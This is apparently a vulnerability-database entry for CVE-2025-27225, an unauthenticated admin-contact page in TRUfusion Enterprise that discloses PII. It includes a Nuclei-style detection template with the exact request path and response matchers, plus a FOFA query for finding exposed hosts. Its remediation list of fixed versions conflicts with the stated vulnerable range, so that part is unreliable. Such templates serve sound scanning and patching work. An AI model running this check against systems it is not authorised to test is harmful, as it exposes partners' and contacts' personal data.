漏洞描述
TRUfusion Enterprise versions 7.10.4.0 and earlier contained a vulnerability that allowed unauthenticated access to the Internal Admin Contact Page, resulting in the disclosure of PII (including partner and contact names).
CVE-2025-27225: TRUfusion Enterprise <= 7.10.4.0 - Admin Contact Portal
PoC代码[已公开]
id: CVE-2025-27225
info:
name: TRUfusion Enterprise <= 7.10.4.0 - Admin Contact Portal
author: DhiyaneshDK,rcesecurity
severity: high
description: |
TRUfusion Enterprise versions 7.10.4.0 and earlier contained a vulnerability that allowed unauthenticated access to the Internal Admin Contact Page, resulting in the disclosure of PII (including partner and contact names).
remediation: |
Upgrade TRUfusion Enterprise to a secure version by updating to one of the following releases: 7.10.3.1, 7.10.1.1, 7.10.1.0, 7.10.3.0, 7.9.6.1, 7.9.6.0, 7.9.5.0, 7.9.4.0, 7.9.3.1, 7.9.3.0, 7.9.2.1, 7.10.2.0, or 7.10.0.1.
reference:
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2025-27225.txt
- https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/
- https://docs.rocketsoftware.com/bundle/trufusion_rn_71031/page/kwg1743156415157.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-27225
epss-score: 0.20162
epss-percentile: 0.95264
cwe-id: CWE-288
metadata:
verified: true
max-request: 1
fofa-query: body="TRUfusion"
tags: cve,cve2025,trufusion,auth-bypass,vuln
http:
- method: GET
path:
- "{{BaseURL}}/trufusionPortal/jsp/internal_admin_contact_login.jsp"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Partner : ", "page.logout()", "trufusionPortal")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100957d7f0603d017ca72a3e7193f6b0d699eb23fed64c3d817fe58fa9ffdfb85370221009da7eaba959b1dc1a24bd76e7da7f8c15f65f9f8b0c9a716d7c7831d21b1ab04:922c64590222798bb761d5b6d8e72950